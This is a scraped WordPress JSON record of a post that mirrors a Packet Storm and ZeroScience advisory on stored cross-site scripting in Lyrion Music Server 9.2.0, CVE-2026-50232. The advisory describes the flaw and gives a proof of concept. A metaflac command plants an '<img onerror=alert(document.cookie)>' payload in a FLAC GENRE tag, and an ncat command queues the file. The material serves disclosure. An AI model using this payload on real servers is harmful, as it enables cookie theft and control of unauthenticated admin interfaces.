{"id":60212,"date":"2026-06-05T13:46:32","date_gmt":"2026-06-05T13:46:32","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=60212"},"modified":"2026-06-05T13:46:32","modified_gmt":"2026-06-05T13:46:32","slug":"lyrion-music-server-920-metadata-persistent-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=60212","title":{"rendered":"\ud83d\udcc4 Lyrion Music Server 9.2.0 metadata Persistent Cross Site Scripting_PACKETSTORM:222805"},"content":{"rendered":"

{“lastseen”:”2026-06-05T18:15:56″,”description”:”Lyrion Music Server version 9.2.0 stores media file metadata tags such as GENRE, ARTIST, and ALBUM exactly as written in the file and later renders them in its web interface without HTML-encoding, resulting in persistent cross site scripting. An…”,”published”:”2026-06-05T00:00:00″,”modified”:”2026-06-05T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Lyrion Music Server 9.2.0 metadata Persistent Cross Site Scripting”,”source”:””,”references”:””,”id”:”PACKETSTORM:222805″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-50232″],”sourceData”:”Lyrion Music Server 9.2.0 (metadata) Stored XSS\\n \\n \\n Vendor: LMS Community\\n Product web page: https:\/\/www.lyrion.org\\n Affected version 9.2.0\\n \\n Summary: Lyrion Music Server (formerly Logitech Media Server, and\\n often abbreviated as \\”LMS\\” ) is open-source software which can control\\n and serve (stream) music to a wide range of physical and virtual audio\\n players called Squeezeboxes. Lyrion Music Server can stream your local\\n music collection, internet radio stations, and content from many streaming\\n services (with and without subscriptions).\\n \\n Desc: Lyrion Music Server stores media file metadata tags (such as GENRE,\\n ARTIST, and ALBUM) exactly as written in the file and later renders them\\n in its web interface without HTML-encoding, resulting in stored cross-site\\n scripting. An attacker who gets a file with a malicious tag into the victim’s\\n library has their payload saved during the next library scan and executed\\n automatically whenever a user views that track’s information or plays the\\n file in the web UI. Because LMS is unauthenticated by default, the injected\\n script runs with full access to the management interface, allowing admin\\n commands, settings disclosure, and further exploitation.\\n \\n Tested on: Windows 10 (64-bit) – EN\\n Lyrion Music Server (9.2.0 – 1779973211)\\n Perl\/5.32.1\\n SQLite\\n \\n \\n Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic\\n @zeroscience\\n \\n \\n Advisory ID: ZSL-2026-5990\\n Advisory URL: https:\/\/www.zeroscience.mk\/#\/advisories\/ZSL-2026-5990\\n CVE ID: CVE-2026-50232\\n CVE URL: https:\/\/www.cve.org\/CVERecord?id=CVE-2026-50232\\n \\n \\n 27.05.2026\\n \\n –\\n \\n \\n $ metaflac –set-tag=GENRE=\\”\\u003cimg src=1 onerror=alert(document.cookie)\\u003e\\” evil.flac\\n $ metaflac –list evil.flac\\n METADATA block #0\\n type: 0 (STREAMINFO)\\n is last: false\\n length: 34\\n minimum blocksize: 4608 samples\\n maximum blocksize: 4608 samples\\n minimum framesize: 2305 bytes\\n maximum framesize: 14124 bytes\\n sample_rate: 44100 Hz\\n channels: 2\\n bits-per-sample: 16\\n total samples: 4664587\\n MD5 signature: 2aeee69c0153cb652c718dfdf0e9ff2d\\n METADATA block #1\\n type: 4 (VORBIS_COMMENT)\\n is last: false\\n length: 98\\n vendor string: Lavf57.83.100\\n comments: 2\\n comment[0]: encoder=Lavf57.83.100\\n comment[1]: GENRE=\\u003cimg src=1 onerror=alert(document.cookie)\\u003e\\n METADATA block #2\\n type: 1 (PADDING)\\n is last: true\\n length: 8140\\n \\n $ ncat localhost 9090\\n playlist add file:\/\/\/music\/evil.flac”,”sourceHref”:”https:\/\/packetstorm.news\/download\/222805″,”cvss”:{“score”:7.2,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:L\/I:L\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/222805\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-06-05T18:15:56″,”description”:”Lyrion Music Server version 9.2.0 stores media file metadata tags such as GENRE, ARTIST, and ALBUM exactly as written in the file and later renders…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,15,13,53,7,11,5],"class_list":["post-60212","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Lyrion Music Server 9.2.0 metadata Persistent Cross Site Scripting_PACKETSTORM:222805 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=60212\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Lyrion Music Server 9.2.0 metadata Persistent Cross Site Scripting_PACKETSTORM:222805 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-06-05T18:15:56″,”description”:”Lyrion Music Server version 9.2.0 stores media file metadata tags such as GENRE, ARTIST, and ALBUM exactly as written in the file and later renders...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=60212\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-05T13:46:32+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=60212#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=60212\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Lyrion Music Server 9.2.0 metadata Persistent Cross Site Scripting_PACKETSTORM:222805\",\"datePublished\":\"2026-06-05T13:46:32+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=60212\"},\"wordCount\":562,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.2\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=60212#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=60212\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=60212\",\"name\":\"\ud83d\udcc4 Lyrion Music Server 9.2.0 metadata Persistent Cross Site Scripting_PACKETSTORM:222805 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-06-05T13:46:32+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=60212#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=60212\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=60212#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Lyrion Music Server 9.2.0 metadata Persistent Cross Site Scripting_PACKETSTORM:222805\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Lyrion Music Server 9.2.0 metadata Persistent Cross Site Scripting_PACKETSTORM:222805 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=60212","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Lyrion Music Server 9.2.0 metadata Persistent Cross Site Scripting_PACKETSTORM:222805 - zero redgem","og_description":"{“lastseen”:”2026-06-05T18:15:56″,”description”:”Lyrion Music Server version 9.2.0 stores media file metadata tags such as GENRE, ARTIST, and ALBUM exactly as written in the file and later renders...","og_url":"https:\/\/zero.redgem.net\/?p=60212","og_site_name":"zero redgem","article_published_time":"2026-06-05T13:46:32+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=60212#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=60212"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Lyrion Music Server 9.2.0 metadata Persistent Cross Site Scripting_PACKETSTORM:222805","datePublished":"2026-06-05T13:46:32+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=60212"},"wordCount":562,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.2","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=60212#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=60212","url":"https:\/\/zero.redgem.net\/?p=60212","name":"\ud83d\udcc4 Lyrion Music Server 9.2.0 metadata Persistent Cross Site Scripting_PACKETSTORM:222805 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-06-05T13:46:32+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=60212#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=60212"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=60212#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Lyrion Music Server 9.2.0 metadata Persistent Cross Site Scripting_PACKETSTORM:222805"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/60212","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=60212"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/60212\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=60212"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=60212"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=60212"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}